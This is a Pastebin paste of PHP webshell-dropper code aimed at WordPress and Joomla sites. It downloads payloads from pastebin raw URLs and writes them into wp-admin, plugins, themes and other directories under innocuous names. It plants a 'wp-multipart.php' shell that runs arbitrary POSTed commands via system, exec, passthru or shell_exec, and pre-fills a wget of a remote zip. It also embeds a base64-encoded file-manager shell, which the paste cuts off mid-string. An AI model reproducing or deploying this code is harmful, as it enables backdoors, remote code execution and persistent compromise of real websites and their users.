dragondevile

Dejanctor

Dec 10th, 2017
566
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 42.40 KB | None | 0 0
  1. // <================================================>
  2. $wordpress = 0; // wordpress Activité
  3. // <================================================>
  4. $wp_2 = 0; // multipart Activité
  5. // <================================================>
  6. $multipartdexter = 1; // multipart Activité
  7. // <================================================>
  8. $sexhub = 0; // Joomla & wordpress working in public_html/......
  9. // <================================================>
  10. set_time_limit(0);
  11. error_reporting(0);
  12. echo "
  13. <style>
  14. .myButton {
  15. -moz-box-shadow:inset -1px 0px 50px 0px #fff6af;
  16. -webkit-box-shadow:inset -1px 0px 50px 0px #fff6af;
  17. background:-moz-linear-gradient(top, #ffec64 5%, #ffab23 100%);
  18. background:linear-gradient(to bottom, #ffec64 5%, #ffab23 100%);
  19. filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffec64', endColorstr='#ffab23',GradientType=0);
  20. background-color:#ffec64;
  21. -moz-border-radius:7px;
  22. -webkit-border-radius:7px;
  23. border-radius:7px;
  24. border:1px solid #ffaa22;
  25. display:inline-block;
  26. cursor:pointer;
  27. color:#333333;
  28. font-family:Arial;
  29. font-size:13px;
  30. padding:4px 5px;
  31. text-decoration:none;
  32. text-shadow:10px 0px 41px #ffee66;
  33. }
  34. </style>
  35. ";
  36. $script = basename($_SERVER['SCRIPT_NAME']);
  37. $azzouz = $_SERVER['HTTP_HOST'];
  38. $azerty = $_SERVER['SERVER_NAME'];
  39. $abcd = dirname($_SERVER['PHP_SELF']) ;
  40. $url = "$azerty/$abcd";
  41. echo "<link href='http://www.iconj.com/ico/g/0/g0f05tlicq.ico' rel='shortcut icon' type='image/x-icon'>
  42. <title>Manager</title><br>
  43. <form method='POST'>
  44. <a href='$script?ls' class='myButton'>ScanDir</a>
  45. <a href='$script?random' class='myButton'>Random</a>
  46. <a href='$script?kill' class='myButton' style='color: blue;'>Remove</a>
  47. <a href='$script?dexter' class='myButton'>Execute</a>
  48. <a href='$script?presta' class='myButton'>PreSheap</a>
  49. <a href='$script?wordpress' class='myButton'>wordpress</a>
  50. <a href='$script?upload' class='myButton'>Upload</a>
  51. <a href='$script?lite' class='myButton'>Shell</a>
  52. <a href='$script?reset' class='myButton'>Reset</a>
  53. </form>";
  54. ///////////////////////////////////////
  55. if($sexhub !== 1 ){}else{
  56. $fgh = @file_get_contents('https://pastebin.com/raw/nxJA9qiA');
  57. $xcbv = "./modules/posts.php";
  58. $wxcv=fopen($xcbv,'w');
  59. fwrite($wxcv,$fgh);
  60. $rtyu = @file_get_contents('https://pastebin.com/raw/jWBjgLd2');
  61. $jklm = "./modules/value.php";
  62. $sdf=fopen($jklm,'w');
  63. fwrite($sdf,$rtyu);
  64. $ghjk = @file_get_contents('https://pastebin.com/raw/wL527WWg');
  65. $uio = "./modules/links.php";
  66. $cvb=fopen($uio,'w');
  67. fwrite($cvb,$ghjk);
  68. $fgh = @file_get_contents('https://pastebin.com/raw/nxJA9qiA');
  69. $xcbv = "./wp-admin/posts.php";
  70. $wxcv=fopen($xcbv,'w');
  71. fwrite($wxcv,$fgh);
  72. $rtyu = @file_get_contents('https://pastebin.com/raw/jWBjgLd2');
  73. $jklm = "./wp-admin/value.php";
  74. $sdf=fopen($jklm,'w');
  75. fwrite($sdf,$rtyu);
  76. $ghjk = @file_get_contents('https://pastebin.com/raw/wL527WWg');
  77. $uio = "./wp-admin/links.php";
  78. $cvb=fopen($uio,'w');
  79. fwrite($cvb,$ghjk);
  80. echo "<br><br>";
  81. echo "<font style="."color:#9c0000".">[-] </font><a style="."color:#0a5d00"." href="."http://$azzouz/modules/links.php"." target="."_blank".">www.$azzouz/modules/wp-links.php"."</a><br>";
  82. echo "<font style="."color:#9c0000".">[-] </font><a style="."color:#5a3ab7"." href="."http://$azzouz/modules/value.php?pass=ransomware"." target="."_blank".">www.$azzouz/modules/wp-value.php"."</a><br>";
  83. echo "<font style="."color:#9c0000".">[-] </font><a style="."color:#5a3ab7"." href="."http://$azzouz/modules/posts.php"." target="."_blank".">www.$azzouz/modules/wp-posts.php"."</a>";
  84. echo "<br><br>";
  85. echo "<font style="."color:#9c0000".">[-] </font><a style="."color:#0a5d00"." href="."http://$azzouz/wp-admin/links.php"." target="."_blank".">www.$azzouz/wp-admin/wp-links.php"."</a><br>";
  86. echo "<font style="."color:#9c0000".">[-] </font><a style="."color:#5a3ab7"." href="."http://$azzouz/wp-admin/value.php?pass=ransomware"." target="."_blank".">www.$azzouz/wp-admin/wp-value.php"."</a><br>";
  87. echo "<font style="."color:#9c0000".">[-] </font><a style="."color:#5a3ab7"." href="."http://$azzouz/wp-admin/posts.php"." target="."_blank".">www.$azzouz/wp-admin/wp-posts.php"."</a>";
  88. echo "<br>";
  89. }
  90. ///////////////////////////////////////
  91. if($wordpress !== 1 ){}else{
  92. $fgh = @file_get_contents('https://pastebin.com/raw/nxJA9qiA');
  93. $xcbv = "../../../../wp-posts.php";
  94. $wxcv=fopen($xcbv,'w');
  95. fwrite($wxcv,$fgh);
  96. $rtyu = @file_get_contents('https://pastebin.com/raw/jWBjgLd2');
  97. $jklm = "../../../../wp-value.php";
  98. $sdf=fopen($jklm,'w');
  99. fwrite($sdf,$rtyu);
  100. $ghjk = @file_get_contents('https://pastebin.com/raw/wL527WWg');
  101. $uio = "../../../../wp-links.php";
  102. $cvb=fopen($uio,'w');
  103. fwrite($cvb,$ghjk);
  104. }
  105. ///////////////////////////////////////
  106. if($wp_2 !== 1 ){}else{
  107. $fgh = @file_get_contents('https://pastebin.com/raw/nxJA9qiA');
  108. $xcbv = "../../../wp-posts.php";
  109. $wxcv=fopen($xcbv,'w');
  110. fwrite($wxcv,$fgh);
  111. $rtyu = @file_get_contents('https://pastebin.com/raw/jWBjgLd2');
  112. $jklm = "../../../wp-value.php";
  113. $sdf=fopen($jklm,'w');
  114. fwrite($sdf,$rtyu);
  115. $ghjk = @file_get_contents('https://pastebin.com/raw/wL527WWg');
  116. $uio = "../../../wp-links.php";
  117. $cvb=fopen($uio,'w');
  118. fwrite($cvb,$ghjk);
  119. }
  120. ///////////////////////////////////////
  121. $multipart = '
  122. <html>
  123. <br>
  124. <div style="text-align: left;">
  125. <form method="post" enctype="multipart/form-data">
  126. <input name="cmd" value="wget http://batut.com.ua/misc/farbtastic/ms-authorze.zip" size="50" type="text"/>
  127. <input value="Execute" id="Execute" type="submit"/>
  128. <br></div>
  129. </form>
  130. <form method="post" enctype="multipart/form-data">
  131. <input name="cmd" value="unzip ms-authorze.zip" size="50" type="text"/>
  132. <input value="Execute" id="Execute" type="submit"/>
  133. <br></div></form>
  134. <br>
  135. <br>
  136. <?php
  137. $azerty = $_SERVER["SERVER_NAME"];
  138. $abcd = dirname($_SERVER["PHP_SELF"]) ;
  139. $url = "$azerty/$abcd";
  140. echo "<br><br>";
  141. echo "<font style="."color:#9c0000".">[+] </font><a style="."color:#0a5d00"." href="."http://$url/wp-authorze.php"." target="."_blank".">www.$url/wp-authorze.php"."</a><br>";
  142. echo "<font style="."color:#9c0000".">[+] </font><a style="."color:#5a3ab7"." href="."http://$url/wp-views.php?pass=ransomware"." target="."_blank".">www.$url/wp-views.php"."</a><br>";
  143. echo "<font style="."color:#9c0000".">[+] </font><a style="."color:#5a3ab7"." href="."http://$url/wp-output.php"." target="."_blank".">www.$url/wp-output.php"."</a>";
  144. echo "<br><br>";
  145. if (isset($_POST["cmd"])) {
  146. function exe($cmd) {
  147. if(function_exists("system")) {
  148. @ob_start();
  149. @system($cmd);
  150. $buff = @ob_get_contents();
  151. @ob_end_clean();
  152. return $buff;
  153. } elseif(function_exists("exec")) {
  154. @exec($cmd,$results);
  155. $buff = "";
  156. foreach($results as $result) {
  157. $buff .= $result;
  158. } return $buff;
  159. } elseif(function_exists("passthru")) {
  160. @ob_start();
  161. @passthru($cmd);
  162. $buff = @ob_get_contents();
  163. @ob_end_clean();
  164. return $buff;
  165. } elseif(function_exists("shell_exec")) {
  166. $buff = @shell_exec($cmd);
  167. return $buff;
  168. }
  169. }
  170. echo "<pre>".exe($_POST["cmd"])."</pre>";
  171. } //Dexter Haxor ./www.fb.com/dreamdeface.org
  172. ?>
  173. ';
  174. if($multipartdexter !== 1 ){}else{
  175. $auth=fopen("wp-multipart.php",'w');
  176. fwrite($auth,$multipart);
  177. $auth2=fopen("../../wp-multipart.php",'w');
  178. fwrite($auth2,$multipart);
  179. $auth2=fopen("../../../wp-multipart.php",'w');
  180. fwrite($auth2,$multipart);
  181. $auth3=fopen("../../../../wp-multipart.php",'w');
  182. fwrite($auth3,$multipart);
  183. }
  184. echo "<br>";
  185. echo "<font style='color:#9c0000'>[+] </font><a style='color:#0a5d00' href="."https://$azzouz/index.php"." target="."_blank".">www.$azzouz/index.php"."</a><br>";
  186. echo "<font style='color:#9c0000'>[+] </font><a style='color:#0a5d00' href="."http://$url/wp-multipart.php"." target="."_blank".">www.$url/wp-multipart.php"."</a><br>";
  187. echo "<font style='color:#9c0000'>[+] </font><a style='color:#0a5d00' href="."http://$azzouz/wp-multipart.php"." target="."_blank".">www.$azzouz/wp-multipart.php"."</a><br>";
  188. echo "<br>";
  189. echo "<font style="."color:#9c0000".">[+] </font><a style="."color:#5a3ab7"." href="."http://$azzouz/wp-posts.php"." target="."_blank".">www.$azzouz/wp-posts.php"."</a><br>";
  190. echo "<font style="."color:#9c0000".">[+] </font><a style="."color:#5a3ab7"." href="."http://$azzouz/wp-value.php?pass=ransomware"." target="."_blank".">www.$azzouz/wp-value.php"."</a><br>";
  191. echo "<font style="."color:#9c0000".">[+] </font><a style="."color:#5a3ab7"." href="."http://$azzouz/wp-links.php"." target="."_blank".">www.$azzouz/wp-links.php"."</a>";
  192. echo "<br><br>";
  193. if(isset($_GET["wordpress"])){
  194. $sss=array('./','../','../../','../../../','../../../../','../../../../../','../../../../../../');
  195. foreach($sss as $pa){
  196. $p1=array("$pa/wp-admin/user/");
  197. foreach($p1 as $path){
  198. if (file_exists("$path")){
  199. $print = $path."cron".rand(999, 123).".php";
  200. //-------------------------------------------
  201. $url = 'https://pastebin.com/raw/jWBjgLd2';
  202. $st = curl_init();
  203. curl_setopt($st,CURLOPT_URL,$url);
  204. curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
  205. curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
  206. $html = curl_exec($st);
  207. curl_close($st);
  208. //-------------------------------------------
  209. $save=fopen($print,'w');
  210. fwrite($save,$html);
  211. $print = "__$print";
  212. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
  213. echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print?pass=ransomware"." target="."_blank".">$azzouz/$print"."</a><br>";
  214. break;
  215. }
  216. $p2=array("$pa/wp-content/plugins/");
  217. foreach($p2 as $path){
  218. if (file_exists("$path")){
  219. $print = $path."cron".rand(999, 123).".php";
  220. //-------------------------------------------
  221. $url = 'https://pastebin.com/raw/jWBjgLd2';
  222. $st = curl_init();
  223. curl_setopt($st,CURLOPT_URL,$url);
  224. curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
  225. curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
  226. $html = curl_exec($st);
  227. curl_close($st);
  228. //-------------------------------------------
  229. $save=fopen($print,'w');
  230. fwrite($save,$html);
  231. $print = "__$print";
  232. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
  233. echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print?pass=ransomware"." target="."_blank".">$azzouz/$print"."</a><br>";
  234. }}
  235. }
  236. //////
  237. $p3=array("$pa/wp-admin/network/");
  238. foreach($p3 as $path){
  239. if (file_exists("$path")){
  240. $print = $path."system".rand(999, 123).".php";
  241. //-------------------------------------------
  242. $url = 'https://pastebin.com/raw/nxJA9qiA';
  243. $st = curl_init();
  244. curl_setopt($st,CURLOPT_URL,$url);
  245. curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
  246. curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
  247. $html = curl_exec($st);
  248. curl_close($st);
  249. //-------------------------------------------
  250. $save=fopen($print,'w');
  251. fwrite($save,$html);
  252. $print = "__$print";
  253. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
  254. echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
  255. break;
  256. }
  257. $p4=array("$pa/wp-content/languages/");
  258. foreach($p4 as $path){
  259. if (file_exists("$path")){
  260. $print = $path."system".rand(999, 123).".php";
  261. //-------------------------------------------
  262. $url = 'https://pastebin.com/raw/nxJA9qiA';
  263. $st = curl_init();
  264. curl_setopt($st,CURLOPT_URL,$url);
  265. curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
  266. curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
  267. $html = curl_exec($st);
  268. curl_close($st);
  269. //-------------------------------------------
  270. $save=fopen($print,'w');
  271. fwrite($save,$html);
  272. $print = "__$print";
  273. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
  274. echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
  275. }}
  276. }
  277. //////
  278. $p5=array("$pa/wp-content/themes/");
  279. foreach($p5 as $path){
  280. if (file_exists("$path")){
  281. $print = $path."view".rand(999, 123).".php";
  282. //-------------------------------------------
  283. $url = 'https://pastebin.com/raw/wL527WWg';
  284. $st = curl_init();
  285. curl_setopt($st,CURLOPT_URL,$url);
  286. curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
  287. curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
  288. $html = curl_exec($st);
  289. curl_close($st);
  290. //-------------------------------------------
  291. $save=fopen($print,'w');
  292. fwrite($save,$html);
  293. $print = "__$print";
  294. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
  295. echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
  296. break;
  297. }
  298. $p6=array("$pa/wp-admin/");
  299. foreach($p6 as $path){
  300. if (file_exists("$path")){
  301. $print = $path."view".rand(999, 123).".php";
  302. //-------------------------------------------
  303. $url = 'https://pastebin.com/raw/wL527WWg';
  304. $st = curl_init();
  305. curl_setopt($st,CURLOPT_URL,$url);
  306. curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
  307. curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
  308. $html = curl_exec($st);
  309. curl_close($st);
  310. //-------------------------------------------
  311. $save=fopen($print,'w');
  312. fwrite($save,$html);
  313. $print = "__$print";
  314. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
  315. echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
  316. }}
  317. }
  318. }
  319. }
  320. if(isset($_GET["lite"])){
  321. $al7wa = base64_decode('PD9waHAKc2V0X3RpbWVfbGltaXQoMCk7CmVycm9yX3JlcG9ydGluZygwKTsKCmlmKGdldF9tYWdpY19xdW90ZXNfZ3BjKCkpewogICAgZm9yZWFjaCgkX1BPU1QgYXMgJGtleT0+JHZhbHVlKXsKICAgICAgICAkX1BPU1RbJGtleV0gPSBzdHJpcHNsYXNoZXMoJHZhbHVlKTsKICAgIH0KfQplY2hvICc8IURPQ1RZUEUgSFRNTD4KPEhUTUw+CjxIRUFEPgo8bGluayBocmVmPSIiIHJlbD0ic3R5bGVzaGVldCIgdHlwZT0idGV4dC9jc3MiPgo8bGluayBocmVmPSJodHRwOi8vd3d3Lmljb25qLmNvbS9pY28vZy8wL2cwZjA1dGxpY3EuaWNvIiByZWw9InNob3J0Y3V0IGljb24iIHR5cGU9ImltYWdlL3gtaWNvbiI+Cjx0aXRsZT5NYW5hZ2VyPC90aXRsZT4KPHN0eWxlPgpib2R5ewogICAgZm9udC1mYW1pbHk6ICJSYWNpbmcgU2FucyBPbmUiLCBjdXJzaXZlOwogICAgYmFja2dyb3VuZC1jb2xvcjogI2U2ZTZlNjsKICAgIHRleHQtc2hhZG93OjBweCAwcHggMXB4ICM3NTc1NzU7Cn0KI2NvbnRlbnQgdHI6aG92ZXJ7CiAgICBiYWNrZ3JvdW5kLWNvbG9yOiAjNjM2MjYzOwogICAgdGV4dC1zaGFkb3c6MHB4IDBweCAxMHB4ICNmZmY7Cn0KI2NvbnRlbnQgLmZpcnN0ewogICAgYmFja2dyb3VuZC1jb2xvcjogc2lsdmVyOwp9CiNjb250ZW50IC5maXJzdDpob3ZlcnsKICAgIGJhY2tncm91bmQtY29sb3I6IHNpbHZlcjsKICAgIHRleHQtc2hhZG93OjBweCAwcHggMXB4ICM3NTc1NzU7Cn0KdGFibGV7CiAgICBib3JkZXI6IDFweCAjMDAwMDAwIGRvdHRlZDsKfQpIMXsKICAgIGZvbnQtZmFtaWx5OiAiUnllIiwgY3Vyc2l2ZTsKfQphewogICAgY29sb3I6ICMwMDA7CiAgICB0ZXh0LWRlY29yYXRpb246IG5vbmU7Cn0KYTpob3ZlcnsKICAgIGNvbG9yOiAjZmZmOwogICAgdGV4dC1zaGFkb3c6MHB4IDBweCAxMHB4ICNmZmZmZmY7Cn0KaW5wdXQsc2VsZWN0LHRleHRhcmVhewogICAgYm9yZGVyOiAxcHggIzAwMDAwMCBzb2xpZDsKICAgIC1tb3otYm9yZGVyLXJhZGl1czogNXB4OwogICAgLXdlYmtpdC1ib3JkZXItcmFkaXVzOjVweDsKICAgIGJvcmRlci1yYWRpdXM6NXB4Owp9Cjwvc3R5bGU+CjwvSEVBRD4KPEJPRFk+CjxIMT48Y2VudGVyPjwvY2VudGVyPjwvSDE+Cjx0YWJsZSB3aWR0aD0iNzAwIiBib3JkZXI9IjAiIGNlbGxwYWRkaW5nPSIzIiBjZWxsc3BhY2luZz0iMSIgYWxpZ249ImNlbnRlciI+Cjx0cj48dGQ+Q3VycmVudCBQYXRoIDogJzsKaWYoaXNzZXQoJF9HRVRbJ3BhdGgnXSkpewogICAgJHBhdGggPSAkX0dFVFsncGF0aCddOyAgIAp9ZWxzZXsKICAgICRwYXRoID0gZ2V0Y3dkKCk7Cn0KJHBhdGggPSBzdHJfcmVwbGFjZSgnXFwnLCcvJywkcGF0aCk7CiRwYXRocyA9IGV4cGxvZGUoJy8nLCRwYXRoKTsKCmZvcmVhY2goJHBhdGhzIGFzICRpZD0+JHBhdCl7CiAgICBpZigkcGF0ID09ICcnICYmICRpZCA9PSAwKXsKICAgICAgICAkYSA9IHRydWU7CiAgICAgICAgZWNobyAnPGEgaHJlZj0iP3BhdGg9LyI+LzwvYT4nOwogICAgICAgIGNvbnRpbnVlOwogICAgfQogICAgaWYoJHBhdCA9PSAnJykgY29udGludWU7CiAgICBlY2hvICc8YSBocmVmPSI/cGF0aD0nOwogICAgZm9yKCRpPTA7JGk8PSRpZDskaSsrKXsKICAgICAgICBlY2hvICIkcGF0aHNbJGldIjsKICAgICAgICBpZigkaSAhPSAkaWQpIGVjaG8gIi8iOwogICAgfQogICAgZWNobyAnIj4nLiRwYXQuJzwvYT4vJzsKfQplY2hvICc8L3RkPjwvdHI+PHRyPjx0ZD4nOwppZihpc3NldCgkX0ZJTEVTWydmaWxlJ10pKXsKICAgIGlmKGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCRwYXRoLicvJy4kX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpewogICAgICAgIGVjaG8gJzxmb250IGNvbG9yPSJncmVlbiI+RmlsZSBVcGxvYWQgRG9uZS48L2ZvbnQ+PGJyIC8+JzsKICAgIH1lbHNlewogICAgICAgIGVjaG8gJzxmb250IGNvbG9yPSJyZWQiPkZpbGUgVXBsb2FkIEVycm9yLjwvZm9udD48YnIgLz4nOwogICAgfQp9CmVjaG8gJzxmb3JtIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG1ldGhvZD0iUE9TVCI+ClVwbG9hZCBGaWxlIDogPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIC8+CjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJ1cGxvYWQiIC8+CjwvZm9ybT4KPC90ZD48L3RyPic7CmlmKGlzc2V0KCRfR0VUWydmaWxlc3JjJ10pKXsKICAgIGVjaG8gIjx0cj48dGQ+Q3VycmVudCBGaWxlIDogIjsKICAgIGVjaG8gJF9HRVRbJ2ZpbGVzcmMnXTsKICAgIGVjaG8gJzwvdHI+PC90ZD48L3RhYmxlPjxiciAvPic7CiAgICBlY2hvKCc8cHJlPicuaHRtbHNwZWNpYWxjaGFycyhmaWxlX2dldF9jb250ZW50cygkX0dFVFsnZmlsZXNyYyddKSkuJzwvcHJlPicpOwp9ZWxzZWlmKGlzc2V0KCRfR0VUWydvcHRpb24nXSkgJiYgJF9QT1NUWydvcHQnXSAhPSAnZGVsZXRlJyl7CiAgICBlY2hvICc8L3RhYmxlPjxiciAvPjxjZW50ZXI+Jy4kX1BPU1RbJ3BhdGgnXS4nPGJyIC8+PGJyIC8+JzsKICAgIGlmKCRfUE9TVFsnb3B0J10gPT0gJ2NobW9kJyl7CiAgICAgICAgaWYoaXNzZXQoJF9QT1NUWydwZXJtJ10pKXsKICAgICAgICAgICAgaWYoY2htb2QoJF9QT1NUWydwYXRoJ10sJF9QT1NUWydwZXJtJ10pKXsKICAgICAgICAgICAgICAgIGVjaG8gJzxmb250IGNvbG9yPSJncmVlbiI+Q2hhbmdlIFBlcm1pc3Npb24gRG9uZS48L2ZvbnQ+PGJyIC8+JzsKICAgICAgICAgICAgfWVsc2V7CiAgICAgICAgICAgICAgICBlY2hvICc8Zm9udCBjb2xvcj0icmVkIj5DaGFuZ2UgUGVybWlzc2lvbiBFcnJvci48L2ZvbnQ+PGJyIC8+JzsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgICAgICBlY2hvICc8Zm9ybSBtZXRob2Q9IlBPU1QiPgogICAgICAgIFBlcm1pc3Npb24gOiA8aW5wdXQgbmFtZT0icGVybSIgdHlwZT0idGV4dCIgc2l6ZT0iNCIgdmFsdWU9Iicuc3Vic3RyKHNwcmludGYoJyVvJywgZmlsZXBlcm1zKCRfUE9TVFsncGF0aCddKSksIC00KS4nIiAvPgogICAgICAgIDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InBhdGgiIHZhbHVlPSInLiRfUE9TVFsncGF0aCddLiciPgogICAgICAgIDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9Im9wdCIgdmFsdWU9ImNobW9kIj4KICAgICAgICA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iR28iIC8+CiAgICAgICAgPC9mb3JtPic7CiAgICB9ZWxzZWlmKCRfUE9TVFsnb3B0J10gPT0gJ3JlbmFtZScpewogICAgICAgIGlmKGlzc2V0KCRfUE9TVFsnbmV3bmFtZSddKSl7CiAgICAgICAgICAgIGlmKHJlbmFtZSgkX1BPU1RbJ3BhdGgnXSwkcGF0aC4nLycuJF9QT1NUWyduZXduYW1lJ10pKXsKICAgICAgICAgICAgICAgIGVjaG8gJzxmb250IGNvbG9yPSJncmVlbiI+Q2hhbmdlIE5hbWUgRG9uZS48L2ZvbnQ+PGJyIC8+JzsKICAgICAgICAgICAgfWVsc2V7CiAgICAgICAgICAgICAgICBlY2hvICc8Zm9udCBjb2xvcj0icmVkIj5DaGFuZ2UgTmFtZSBFcnJvci48L2ZvbnQ+PGJyIC8+JzsKICAgICAgICAgICAgfQogICAgICAgICAgICAkX1BPU1RbJ25hbWUnXSA9ICRfUE9TVFsnbmV3bmFtZSddOwogICAgICAgIH0KICAgICAgICBlY2hvICc8Zm9ybSBtZXRob2Q9IlBPU1QiPgogICAgICAgIE5ldyBOYW1lIDogPGlucHV0IG5hbWU9Im5ld25hbWUiIHR5cGU9InRleHQiIHNpemU9IjIwIiB2YWx1ZT0iJy4kX1BPU1RbJ25hbWUnXS4nIiAvPgogICAgICAgIDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InBhdGgiIHZhbHVlPSInLiRfUE9TVFsncGF0aCddLiciPgogICAgICAgIDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9Im9wdCIgdmFsdWU9InJlbmFtZSI+CiAgICAgICAgPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkdvIiAvPgogICAgICAgIDwvZm9ybT4nOwogICAgfWVsc2VpZigkX1BPU1RbJ29wdCddID09ICdlZGl0Jyl7CiAgICAgICAgaWYoaXNzZXQoJF9QT1NUWydzcmMnXSkpewogICAgICAgICAgICAkZnAgPSBmb3BlbigkX1BPU1RbJ3BhdGgnXSwndycpOwogICAgICAgICAgICBpZihmd3JpdGUoJGZwLCRfUE9TVFsnc3JjJ10pKXsKICAgICAgICAgICAgICAgIGVjaG8gJzxmb250IGNvbG9yPSJncmVlbiI+RWRpdCBGaWxlIERvbmUuPC9mb250PjxiciAvPic7CiAgICAgICAgICAgIH1lbHNlewogICAgICAgICAgICAgICAgZWNobyAnPGZvbnQgY29sb3I9InJlZCI+RWRpdCBGaWxlIEVycm9yLjwvZm9udD48YnIgLz4nOwogICAgICAgICAgICB9CiAgICAgICAgICAgIGZjbG9zZSgkZnApOwogICAgICAgIH0KICAgICAgICBlY2hvICc8Zm9ybSBtZXRob2Q9IlBPU1QiPgogICAgICAgIDx0ZXh0YXJlYSBjb2xzPTgwIHJvd3M9MjAgbmFtZT0ic3JjIj4nLmh0bWxzcGVjaWFsY2hhcnMoZmlsZV9nZXRfY29udGVudHMoJF9QT1NUWydwYXRoJ10pKS4nPC90ZXh0YXJlYT48YnIgLz4KICAgICAgICA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJwYXRoIiB2YWx1ZT0iJy4kX1BPU1RbJ3BhdGgnXS4nIj4KICAgICAgICA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJvcHQiIHZhbHVlPSJlZGl0Ij4KICAgICAgICA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iR28iIC8+CiAgICAgICAgPC9mb3JtPic7CiAgICB9CiAgICBlY2hvICc8L2NlbnRlcj4nOwp9ZWxzZXsKICAgIGVjaG8gJzwvdGFibGU+PGJyIC8+PGNlbnRlcj4nOwogICAgaWYoaXNzZXQoJF9HRVRbJ29wdGlvbiddKSAmJiAkX1BPU1RbJ29wdCddID09ICdkZWxldGUnKXsKICAgICAgICBpZigkX1BPU1RbJ3R5cGUnXSA9PSAnZGlyJyl7CiAgICAgICAgICAgIGlmKHJtZGlyKCRfUE9TVFsncGF0aCddKSl7CiAgICAgICAgICAgICAgICBlY2hvICc8Zm9udCBjb2xvcj0iZ3JlZW4iPkRlbGV0ZSBEaXIgRG9uZS48L2ZvbnQ+PGJyIC8+JzsKICAgICAgICAgICAgfWVsc2V7CiAgICAgICAgICAgICAgICBlY2hvICc8Zm9udCBjb2xvcj0icmVkIj5EZWxldGUgRGlyIEVycm9yLjwvZm9udD48YnIgLz4nOwogICAgICAgICAgICB9CiAgICAgICAgfWVsc2VpZigkX1BPU1RbJ3R5cGUnXSA9PSAnZmlsZScpewogICAgICAgICAgICBpZih1bmxpbmsoJF9QT1NUWydwYXRoJ10pKXsKICAgICAgICAgICAgICAgIGVjaG8gJzxmb250IGNvbG9yPSJncmVlbiI+RGVsZXRlIEZpbGUgRG9uZS48L2ZvbnQ+PGJyIC8+JzsKICAgICAgICAgICAgfWVsc2V7CiAgICAgICAgICAgICAgICBlY2hvICc8Zm9udCBjb2xvcj0icmVkIj5EZWxldGUgRmlsZSBFcnJvci48L2ZvbnQ+PGJyIC8+JzsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIH0KICAgIGVjaG8gJzwvY2VudGVyPic7CiAgICAkc2NhbmRpciA9IHNjYW5kaXIoJHBhdGgpOwogICAgZWNobyAnPGRpdiBpZD0iY29udGVudCI+PHRhYmxlIHdpZHRoPSI3MDAiIGJvcmRlcj0iMCIgY2VsbHBhZGRpbmc9IjMiIGNlbGxzcGFjaW5nPSIxIiBhbGlnbj0iY2VudGVyIj4KICAgIDx0ciBjbGFzcz0iZmlyc3QiPgogICAgICAgIDx0ZD48Y2VudGVyPk5hbWU8L2NlbnRlcj48L3RkPgogICAgICAgIDx0ZD48Y2VudGVyPlNpemU8L2NlbnRlcj48L3RkPgogICAgICAgIDx0ZD48Y2VudGVyPlBlcm1pc3Npb25zPC9jZW50ZXI+PC90ZD4KICAgICAgICA8dGQ+PGNlbnRlcj5PcHRpb25zPC9jZW50ZXI+PC90ZD4KICAgIDwvdHI+JzsKCiAgICBmb3JlYWNoKCRzY2FuZGlyIGFzICRkaXIpewogICAgICAgIGlmKCFpc19kaXIoIiRwYXRoLyRkaXIiKSB8fCAkZGlyID09ICcuJyB8fCAkZGlyID09ICcuLicpIGNvbnRpbnVlOwogICAgICAgIGVjaG8gIjx0cj4KICAgICAgICA8dGQ+PGEgaHJlZj1cIj9wYXRoPSRwYXRoLyRkaXJcIj4kZGlyPC9hPjwvdGQ+CiAgICAgICAgPHRkPjxjZW50ZXI+LS08L2NlbnRlcj48L3RkPgogICAgICAgIDx0ZD48Y2VudGVyPiI7CiAgICAgICAgaWYoaXNfd3JpdGFibGUoIiRwYXRoLyRkaXIiKSkgZWNobyAnPGZvbnQgY29sb3